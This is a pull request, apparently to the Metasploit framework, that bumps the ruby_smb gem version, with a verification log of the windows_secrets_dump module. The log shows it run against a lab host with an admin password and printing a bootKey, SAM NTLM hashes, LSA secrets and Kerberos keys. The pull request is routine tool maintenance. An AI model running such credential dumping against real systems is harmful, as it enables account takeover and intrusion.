### PR TITLE
Fix rails 7 deprecation warning for secrets dump module

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -430,7 +430,7 @@ GEM
     ruby-progressbar (1.11.0)
     ruby-rc4 (0.1.5)
     ruby2_keywords (0.0.5)
-    ruby_smb (3.2.2)
+    ruby_smb (3.2.3)
       bindata
       openssl-ccm
       openssl-cmac


### PR DESCRIPTION
Pull in the changes from https://github.com/rapid7/ruby_smb/pull/247

Fix rails 7 deprecation warning for secrets dump module

## Verification

Verify the secrets dump module works; This branch doesn't have Rails 7 so you won't see the deprecation warnings either way.

```
msf6 auxiliary(gather/windows_secrets_dump) > rerun rhost=192.168.123.13 username=Administrator password=p4$$w0rd
[*] Reloading module...
[*] Running module against 192.168.123.13

[*] 192.168.123.13:445 - Service RemoteRegistry is in stopped state
[*] 192.168.123.13:445 - Starting service...
[*] 192.168.123.13:445 - Retrieving target system bootKey
[+] 192.168.123.13:445 - bootKey: 0xa03745c7a9597f105a4df1e84a5aef04
[*] 192.168.123.13:445 - Saving remote SAM database
[*] 192.168.123.13:445 - Dumping SAM hashes
[*] 192.168.123.13:445 - Password hints:
No users with password hints on this system
[*] 192.168.123.13:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ede47af254546a82b1743953cc4950:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] 192.168.123.13:445 - Saving remote SECURITY database
[*] 192.168.123.13:445 - Decrypting LSA Key
[*] 192.168.123.13:445 - Dumping LSA Secrets
$MACHINE.ACC
ADF3\DC3$:plain_password_hex:262e5b7aebaee18f11c8a91c3ff3278e084b6611ee599e518eb73ee9dbceeb43bf3bcb26750cc1eee31b76c0eefa452beb1222b8699da99d0ae161448b818b984205356214afcd84303ba95628ce13bb14f6a1d3be334c6d451bff45446120f3e97f201056c2c99f20773407891917ecc4775be7eced5756e9a4a8c0a3ee632ac5b3c06519dc4ddc9f012de730fd948088a56c87182da2cbdba8c929b8d04cbd56c047455fb55178ade9c6428256d7225ddd62234c912cdde04e94615072625d605b3958ede4ef11ce048be2a7e924feef32063918e7926bc5089c4f1778840695d647892be723f641f1c9682c054246
ADF3\DC3$:aes256-cts-hmac-sha1-96:f000095e95ec2c2838edaf060e0e7eddf3efc71b74f4c5aed905a9c7a13ffb85
ADF3\DC3$:aes128-cts-hmac-sha1-96:a0bd74866178f9c96e2df5c1af05221e
ADF3\DC3$:des-cbc-md5:64613130343538353037623338336334


... etc etc ...
```

